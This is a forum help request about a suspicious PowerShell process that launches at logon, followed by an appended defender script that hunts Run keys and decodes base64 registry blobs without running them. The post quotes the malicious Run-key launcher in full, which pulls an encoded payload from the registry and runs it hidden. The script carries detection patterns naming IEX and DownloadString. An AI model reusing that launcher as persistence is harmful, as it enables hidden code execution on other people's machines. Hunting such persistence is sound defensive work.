Suspicious Powershell Activity

Question

Hello,

    We've found a powershell process that recently has started launching when a user logs in, and it appears to be communicating with an outside IP address - not associated with our company at all.  I haven't been able to find the source for this besides two entries in the registry that keep reappearing.

    The registry keys are as follows:

    In HKLM/Software/Microsoft/Windows/CurrentVersion/Run:

    PowerShellAD - "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "$x=$((gp HKLM:Software\Microsoft\Windows\CurrentVersion ComputerID).ComputerID);powershell -Win Hidden -enc $x"

    In HKLM/Software/Microsoft/Windows/CurrentVersion:

    Certificate - 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

    Below is a screenshot of the processes that start when logging in:

    (Screenshot: Powershell processes)

    For the time being, we've put in place a rule to prevent Powershell from running, but we need help finding the source of this and removing it.

    So far, virus scans and root-kit scans are not finding anything, but we're also preventing this from running so it may not find anything.

    Any help would be appreciated.

    Thank you,

    Todd

    25 July 2559, 15:03
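A defender's hunting script for the persistence pattern described in the post (a Run key launching powershell.exe, which pulls a base64 payload out of another registry value and runs it with -enc), added here as an example and not taken from the original thread. It assumes it is run in an elevated PowerShell session on the affected host; it only reads and decodes registry values, it never executes them.

```powershell
# Added example: hunt for PowerShell autorun launchers and decode (never run)
# base64/UTF-16LE blobs parked under CurrentVersion, as described in the post.
$runKeys = @(
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
)
# Traits of the launcher in the post: powershell with an encoded command, a hidden
# window, or a Get-ItemProperty/gp call that fetches the payload from the registry.
$suspicious = 'powershell.*(-enc|-EncodedCommand|-e\s|-Win(dowStyle)?\s+Hidden|Get-ItemProperty|\bgp\s)'

foreach ($key in $runKeys) {
    if (-not (Test-Path $key)) { continue }
    $props = Get-ItemProperty -Path $key
    foreach ($p in $props.PSObject.Properties) {
        if ($p.Name -like 'PS*') { continue }   # skip PSPath, PSParentPath, ...
        if ($p.Value -is [string] -and $p.Value -match $suspicious) {
            Write-Output "[AUTORUN] $key\$($p.Name) = $($p.Value)"
        }
    }
}

# -enc expects base64 of UTF-16LE text, so decode candidate values that way and
# keep only those that come out as printable, script-looking text.
function Test-EncodedScript {
    param([string]$Value)
    if ($Value.Length -lt 64 -or $Value -notmatch '^[A-Za-z0-9+/=]+$') { return $null }
    try { $bytes = [Convert]::FromBase64String($Value) } catch { return $null }
    $text = [Text.Encoding]::Unicode.GetString($bytes)
    if ($text -match '[^\x09\x0A\x0D\x20-\x7E]') { return $null }   # non-printable: not text
    if ($text -match 'IEX|Invoke-Expression|DownloadString|Net\.WebClient|New-Object|\$') { return $text }
    return $null
}

# The post found the blob in the 'Certificate' and 'ComputerID' values here;
# scanning every string value under the key catches renamed copies too.
$cv = Get-ItemProperty -Path 'HKLM:\Software\Microsoft\Windows\CurrentVersion'
foreach ($p in $cv.PSObject.Properties) {
    if ($p.Name -like 'PS*' -or $p.Value -isnot [string]) { continue }
    $decoded = Test-EncodedScript -Value $p.Value
    if ($decoded) {
        Write-Output "[ENCODED] HKLM:\...\CurrentVersion\$($p.Name) decodes to:"
        Write-Output ($decoded.Substring(0, [Math]::Min(400, $decoded.Length)))
    }
}
```

Export the decoded text (and the value names it was read from) before deleting anything, since the Run entry and the payload value are what the scheduled re-creation mechanism, still to be found, keeps restoring.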

All replies